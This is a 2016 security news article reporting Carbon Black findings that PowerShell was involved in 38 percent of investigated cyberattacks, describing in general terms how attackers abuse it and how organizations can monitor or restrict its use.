Endpoint
4/15/2016
03:14 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

PowerShell Increasingly Being Used To Hide Malicious Activity

Data from 1,100 security investigations shows PowerShell was used in 38 percent of cyberattacks

Threat actors often try to take advantage of native tools in operating systems to conceal malicious activities.

One tool that appears to be a particular favorite in this regard is the PowerShell command shell and scripting language that Microsoft has included with its Windows operating system since 2009.

Security firm Carbon Black recently analyzed data from 1,100 investigations conducted by more than two-dozen of its partners in 2015 to see how extensively PowerShell is being exploited in cyber attacks.

The data showed that in 38 percent of the investigated incidents, PowerShell was a part of the attack.  Some 31 percent of the victim organizations said they had no idea that PowerShell had been exploited and discovered that fact only after calling in someone to investigate security incidents.

The most common malicious activity carried out via PowerShell was command and control communications. The data also showed that threat actors, trying to move laterally across a network after breaking into it first, often used PowerShell to conceal their movement. Credential theft and privilege escalation were some of the other common malicious activities enabled via PowerShell.

More than 85 percent of the attacks leveraging PowerShell were what Carbon Black described as commodity attacks such as clickfraud, ransomware, fake antivirus and other opportunistic threats. Many of these attacks appeared focused on stealing customer and financial data, and intellectual property, or on disrupting services. About 13 percent of the attacks appeared targeted, according to Carbon Black.

PowerShell is commonly used to automate repetitive tasks and for system administration purposes. Administrators for instance often use it to access remote systems in order to query them and for executing commands on them.

What makes it an appealing target for compromise is the opportunity it gives attackers to hide malicious activity, Carbon Black said in its report. PowerShell is a ubiquitous part of the Windows environment and is used more for legitimate purposes than not. Therefore it serves as a perfect foil for threat actors to hide their activities, the Carbon Black report noted.

“Its ability to dynamically load and execute code without touching the file system makes it especially difficult to secure,” the company warned.

As is common with many multi-stage attacks these days, PowerShell compromises usual begin via a separate initial compromise enabled through a phishing email or some other social engineering tactic. In a typical attack, a victim might receive a specially crafted Microsoft Office document as an email attachment or as a download via a link in the email. Opening the document usually results in the user being prompted to disable their macro security.

“Many enterprises make extensive use of macros in spreadsheets and Word documents,” says Rico Valdez, senior threat researcher at Carbon Black in comments to Dark Reading. So a target might already be accustomed to disabling macros security to enable enhanced functionality in their docs, he said. “A well-crafted phish in which the target believes the document is coming from a trusted source might have the target believe the macros are legitimate.”

Enterprises need to be cognizant of the risks around PowerShell, Valdez says. What used to be considered a more sophisticated technique until relatively recently has entered the mainstream and is being used in all kinds of attacks, including commodity malware, he says. According to Carbon Black, the relatively easy availability of toolkits such as PowerSploit, PowerShell Empire, p0wnedShell have also made it simple for threat actors to co-opt PowerShell in cyberattacks.

The trend heightens the need for organizations to pay attention to things like setting standards for PowerShell usage, by, for instance, requiring only signed scripts to execute.

Organizations should also consider capturing and monitoring PowerShell executions and storing the log data centrally so an attacker cannot tamper with it. Administrators can then set up alerts on key indicators in the log data, Valdez says. Blocking PowerShell altogether is another option, though that might not always be possible, he says.

“Profile and understand how PowerShell is used in your environment, and watch for or block use that does not meet that profile,” Valdez says. “PowerShell pulling down scripts from the Internet, being invoked with specific parameters, or being launched by users or processes that are not typical in your environment can go a long way toward identifying and stopping these attacks.”

Related stories:

 

Gain insight into the latest threats and emerging best practices for managing them. Attend the Security Track at Interop Las Vegas, May 2-6. Register now!

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
GeethaR978
50%
50%
GeethaR978,
User Rank: Apprentice
4/16/2016 | 3:26:07 AM
informative
very informative. Helps to gain knowledge about new information and concepts.
Cloud Security's Shared Responsibility Is Foggy
Ben Johnson, Co-founder and CTO, Obsidian Security,  9/14/2017
To Be Ready for the Security Future, Pay Attention to the Security Past
Liz Maida, Co-founder, CEO & CTO, Uplevel Security,  9/18/2017
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Write a Caption, Win a Starbucks Card! Click Here
Latest Comment: This comment is waiting for review by our moderators.
Current Issue
Security Vulnerabilities: The Next Wave
Just when you thought it was safe, researchers have unveiled a new round of IT security flaws. Is your enterprise ready?
Flash Poll
[Strategic Security Report] How Enterprises Are Attacking the IT Security Problem
[Strategic Security Report] How Enterprises Are Attacking the IT Security Problem
Enterprises are spending more of their IT budgets on cybersecurity technology. How do your organization's security plans and strategies compare to what others are doing? Here's an in-depth look.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2017-0290
Published: 2017-05-09
NScript in mpengine in Microsoft Malware Protection Engine with Engine Version before 1.1.13704.0, as used in Windows Defender and other products, allows remote attackers to execute arbitrary code or cause a denial of service (type confusion and application crash) via crafted JavaScript code within ...

CVE-2016-10369
Published: 2017-05-08
unixsocket.c in lxterminal through 0.3.0 insecurely uses /tmp for a socket file, allowing a local user to cause a denial of service (preventing terminal launch), or possibly have other impact (bypassing terminal access control).

CVE-2016-8202
Published: 2017-05-08
A privilege escalation vulnerability in Brocade Fibre Channel SAN products running Brocade Fabric OS (FOS) releases earlier than v7.4.1d and v8.0.1b could allow an authenticated attacker to elevate the privileges of user accounts accessing the system via command line interface. With affected version...

CVE-2016-8209
Published: 2017-05-08
Improper checks for unusual or exceptional conditions in Brocade NetIron 05.8.00 and later releases up to and including 06.1.00, when the Management Module is continuously scanned on port 22, may allow attackers to cause a denial of service (crash and reload) of the management module.

CVE-2017-0890
Published: 2017-05-08
Nextcloud Server before 11.0.3 is vulnerable to an inadequate escaping leading to a XSS vulnerability in the search module. To be exploitable a user has to write or paste malicious content into the search dialogue.